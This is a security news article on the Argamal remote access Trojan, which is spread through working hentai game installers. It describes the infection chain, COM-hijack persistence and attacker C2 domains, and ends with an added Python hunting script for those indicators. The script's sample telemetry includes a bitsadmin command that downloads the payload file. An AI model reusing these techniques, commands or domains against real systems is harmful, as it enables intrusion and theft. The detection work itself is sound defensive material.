Hackers Hide New Argamal Malware Inside Working Hentai Games
Hackers hide new Argamal malware inside working hentai games distributed via adult sites and torrents.
Summary
Kaspersky has discovered a new remote access Trojan (RAT) named Argamal, hidden within installers for hentai video games. These malicious installers distribute fully functional games via adult sites and torrents, tricking users into installing the malware, which grants attackers full remote control. The malware is designed to evade detection and maintain persistence, enabling activities like data theft, credential harvesting, and cryptocurrency theft.
Full text
By Deeba Ahmed, June 14, 2026

Cybersecurity firm Kaspersky has discovered a new campaign delivering malware to people downloading adult video games. The malware, detected in April 2026, is named Argamal according to Kaspersky's investigation, and it is hidden inside hentai game installers.

Argamal is a remote access Trojan (RAT) that allows hackers to remotely control a person's computer. Researchers note that normal internet scams usually give you a broken file that will not open. These infected downloads, by contrast, include fully working games built on common engines like RenPy or RPG Maker. The game runs exactly as you want it to, so you never realise your machine is under someone's control.

How the Attack Works

These malicious files are distributed via different platforms such as adult game sites, file-sharing platforms like PixelDrain, and torrent trackers such as AniRena. Right after the game starts, the downloaded game archive launches a rigged version of a standard library file, the FFmpeg DLL, and another file named natives2_blob.bin.

This rigged library loads into the computer's memory without any warning screens popping up, and immediately runs a PowerShell script. To avoid detection, the script first checks the system for monitoring tools like Sandboxie or Procmon64.

[Figure: Malicious game torrent in AniRena (Source: Kaspersky Securelist)]

If the computer seems safe, the malware waits. Three days later, a scheduled task runs and uses a tool called bitsadmin.exe to download an encrypted file (zaesdl.dat) from GitHub, then decrypts it using AES-CBC to create the main Trojan module. To ensure persistence on the device, the malware uses COM hijacking.
It alters the registry entries for a real Windows feature called the Windows Color System Calibration Loader. This feature runs every time a user logs into their PC, meaning the malware automatically starts up during every new user session.

What Hackers Can Do

Once active on the device, Argamal immediately sends UDP heartbeats (updates) to the attackers' servers. These servers are hosted on domains such as asper1.freeddns.org and Winst0.kozow.com. This gives the attackers full control over the system. They can perform malicious activities of all sorts, ranging from stealing files, reading private chats, and gathering financial data to taking screenshots, swapping crypto-wallet addresses, and streaming live video.

[Figure: Game archive contents (Source: Kaspersky Securelist)]

Kaspersky has detected hundreds of users infected so far, mostly in Russia, Brazil, Germany, and Vietnam. Code analysis suggests that the attackers speak Spanish. A crucial finding is that the malware purposefully avoids targeting users in China. Nevertheless, all users of hentai games must avoid unverified adult sites and use real-time security software.
Indicators of Compromise
- domain — asper1.freeddns.org
- domain — Winst0.kozow.com
- malware — Argamal
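
The following Python example is added here and is not taken from Kaspersky or the article. It correlates, per host, the behaviours and indicators described above: the named files, a bitsadmin.exe download from GitHub, a COM registration change, and lookups of the listed domains. The event schema, host names, CLSID and GitHub URL are constructed placeholders, and treating any per-user InprocServer32 registration as a review signal is an assumption, since the article does not give the altered CLSID.

```python
import re
from collections import defaultdict

# Indicators named in the article; compared case-insensitively.
C2_DOMAINS = {"asper1.freeddns.org", "winst0.kozow.com"}
PAYLOAD_FILES = {"zaesdl.dat", "natives2_blob.bin"}
# Assumption: any per-user InprocServer32 registration is worth review as a
# possible COM hijack; the article does not give the CLSID that was altered.
COM_KEY = re.compile(r"^HKCU\\Software\\Classes\\CLSID\\\{[^}]+\}\\InprocServer32$", re.I)

def classify(event):
    """Return the finding labels raised by one normalized telemetry event."""
    kind, found = event.get("type"), []
    if kind == "dns" and event["query"].rstrip(".").lower() in C2_DOMAINS:
        found.append("c2-domain")
    elif kind == "process":
        image, cmd = event["image"].lower(), event["cmdline"].lower()
        if image.rsplit("\\", 1)[-1] == "bitsadmin.exe" and "github.com" in cmd:
            found.append("bitsadmin-github-download")
        if any(name in cmd for name in PAYLOAD_FILES):
            found.append("payload-filename")
    elif kind == "file" and event["path"].lower().rsplit("\\", 1)[-1] in PAYLOAD_FILES:
        found.append("payload-filename")
    elif kind == "registry" and COM_KEY.match(event["key"]):
        found.append("per-user-com-registration")
    return found

def hunt(events):
    """Group findings per host; several distinct signals on one host matter most."""
    hits = defaultdict(set)
    for event in events:
        hits[event["host"]].update(classify(event))
    return {host: sorted(labels) for host, labels in hits.items() if labels}

# Constructed sample telemetry (not real logs); CLSID and URL are placeholders.
SAMPLE_EVENTS = [
    {"host": "PC-01", "type": "file", "path": r"D:\Games\demo\lib\natives2_blob.bin"},
    {"host": "PC-01", "type": "process", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer j https://github.com/PLACEHOLDER/raw/zaesdl.dat C:\Temp\zaesdl.dat"},
    {"host": "PC-01", "type": "registry",
     "key": r"HKCU\Software\Classes\CLSID\{00000000-0000-0000-0000-000000000000}\InprocServer32"},
    {"host": "PC-01", "type": "dns", "query": "Winst0.kozow.com."},
    {"host": "PC-02", "type": "dns", "query": "github.com"},
    {"host": "PC-02", "type": "process", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /list /allusers"},
]

if __name__ == "__main__":
    for host, labels in hunt(SAMPLE_EVENTS).items():
        print(host, labels)
```

Real endpoint telemetry usually records per-user registry paths under the user's SID rather than as `HKCU`, so the key would need normalizing before it reaches `classify`.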